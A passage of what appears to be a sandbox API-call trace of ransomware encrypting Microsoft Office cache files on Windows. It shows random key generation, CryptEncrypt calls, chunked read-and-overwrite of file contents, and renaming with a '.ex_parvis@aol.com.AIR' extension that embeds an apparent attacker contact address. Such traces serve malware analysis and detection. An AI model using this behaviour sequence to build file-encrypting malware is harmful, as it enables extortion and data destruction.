Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0144.801] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a4 [0144.801] GetProcessHeap () returned 0x2e0000 [0144.801] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0144.801] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=222948913) returned 1 [0144.802] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xd49ee31 [0144.802] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0144.802] GetProcessHeap () returned 0x2e0000 [0144.802] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0144.802] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0144.802] WriteFile (in: hFile=0x4a4, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0144.807] WriteFile (in: hFile=0x4a4, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0144.807] WriteFile (in: hFile=0x4a4, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0144.807] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100000) returned 0x33d0020 [0144.807] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100000) returned 0x34e0020 [0144.807] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x1300000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.807] ReadFile (in: hFile=0x4a4, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0144.837] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xd49ef39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.837] WriteFile (in: hFile=0x4a4, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0144.837] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x2600000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.837] ReadFile (in: hFile=0x4a4, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0144.849] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2600000 [0144.850] WriteFile (in: hFile=0x4a4, lpBuffer=0x34e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0144.852] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xd49ef39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.852] WriteFile (in: hFile=0x4a4, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0144.852] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x3900000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.852] ReadFile (in: hFile=0x4a4, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0144.865] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3900000 [0144.865] WriteFile (in: hFile=0x4a4, lpBuffer=0x34e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0144.867] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xd49ef39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.867] WriteFile (in: hFile=0x4a4, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0144.868] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x4c00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.868] ReadFile (in: hFile=0x4a4, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0144.880] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4c00000 [0144.880] WriteFile (in: hFile=0x4a4, lpBuffer=0x34e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0144.882] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xd49ef39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.889] WriteFile (in: hFile=0x4a4, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0144.889] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x5f00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.889] ReadFile (in: hFile=0x4a4, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0144.895] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5f00000 [0144.895] WriteFile (in: hFile=0x4a4, lpBuffer=0x34e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0144.897] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xd49ef39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.898] WriteFile (in: hFile=0x4a4, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0144.898] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x7200000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.898] ReadFile (in: hFile=0x4a4, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0144.911] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7200000 [0144.911] WriteFile (in: hFile=0x4a4, lpBuffer=0x34e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0144.913] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xd49ef39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.913] WriteFile (in: hFile=0x4a4, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0144.913] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x8500000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.914] ReadFile (in: hFile=0x4a4, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0144.935] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8500000 [0144.935] WriteFile (in: hFile=0x4a4, lpBuffer=0x34e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0144.937] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xd49ef39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.937] WriteFile (in: hFile=0x4a4, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0144.937] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x9800000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.937] ReadFile (in: hFile=0x4a4, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0144.943] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9800000 [0144.943] WriteFile (in: hFile=0x4a4, lpBuffer=0x34e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0144.969] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xd49ef39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.970] WriteFile (in: hFile=0x4a4, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0144.970] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xab00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.970] ReadFile (in: hFile=0x4a4, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0144.976] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xab00000 [0144.976] WriteFile (in: hFile=0x4a4, lpBuffer=0x34e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0144.979] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xd49ef39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.979] WriteFile (in: hFile=0x4a4, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0144.979] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xbe00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.979] ReadFile (in: hFile=0x4a4, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0144.993] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xbe00000 [0144.993] WriteFile (in: hFile=0x4a4, lpBuffer=0x34e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0144.995] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xd49ef39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.995] WriteFile (in: hFile=0x4a4, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0144.996] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33d0020 | out: hHeap=0x2e0000) returned 1 [0145.000] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e0020 | out: hHeap=0x2e0000) returned 1 [0145.005] CloseHandle (hObject=0x4a4) returned 1 [0145.381] GetProcessHeap () returned 0x2e0000 [0145.381] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0145.381] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0145.381] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0145.381] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385ab8 | out: hHeap=0x2e0000) returned 1 [0145.381] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385a10 | out: hHeap=0x2e0000) returned 1 [0145.381] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385a10 [0145.381] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0145.381] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0145.381] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0145.382] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0145.382] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab", dwFileAttributes=0x80) returned 1 [0145.387] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 75 [0145.387] GetProcessHeap () returned 0x2e0000 [0145.387] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfc) returned 0x363a50 [0145.387] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" [0145.387] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.12781717671972518758.ex_parvis@aol.com.AIR" [0145.387] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0145.391] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a4 [0145.391] GetProcessHeap () returned 0x2e0000 [0145.391] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0145.391] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=177720283) returned 1 [0145.391] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xa97cbdb [0145.391] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0145.391] GetProcessHeap () returned 0x2e0000 [0145.391] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0145.391] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0145.391] WriteFile (in: hFile=0x4a4, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0145.395] WriteFile (in: hFile=0x4a4, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0145.395] WriteFile (in: hFile=0x4a4, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0145.395] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100000) returned 0x33d0020 [0145.396] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100000) returned 0x34e0020 [0145.396] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x1300000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.396] ReadFile (in: hFile=0x4a4, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0145.425] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xa97cce3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.425] WriteFile (in: hFile=0x4a4, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0145.425] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x2600000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.425] ReadFile (in: hFile=0x4a4, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0145.445] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2600000 [0145.445] WriteFile (in: hFile=0x4a4, lpBuffer=0x34e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0145.447] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xa97cce3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.447] WriteFile (in: hFile=0x4a4, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0145.447] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x3900000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.447] ReadFile (in: hFile=0x4a4, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0145.460] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3900000 [0145.460] WriteFile (in: hFile=0x4a4, lpBuffer=0x34e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0145.463] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xa97cce3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.463] WriteFile (in: hFile=0x4a4, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0145.463] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x4c00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.463] ReadFile (in: hFile=0x4a4, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0145.476] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4c00000 [0145.476] WriteFile (in: hFile=0x4a4, lpBuffer=0x34e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0145.478] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xa97cce3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 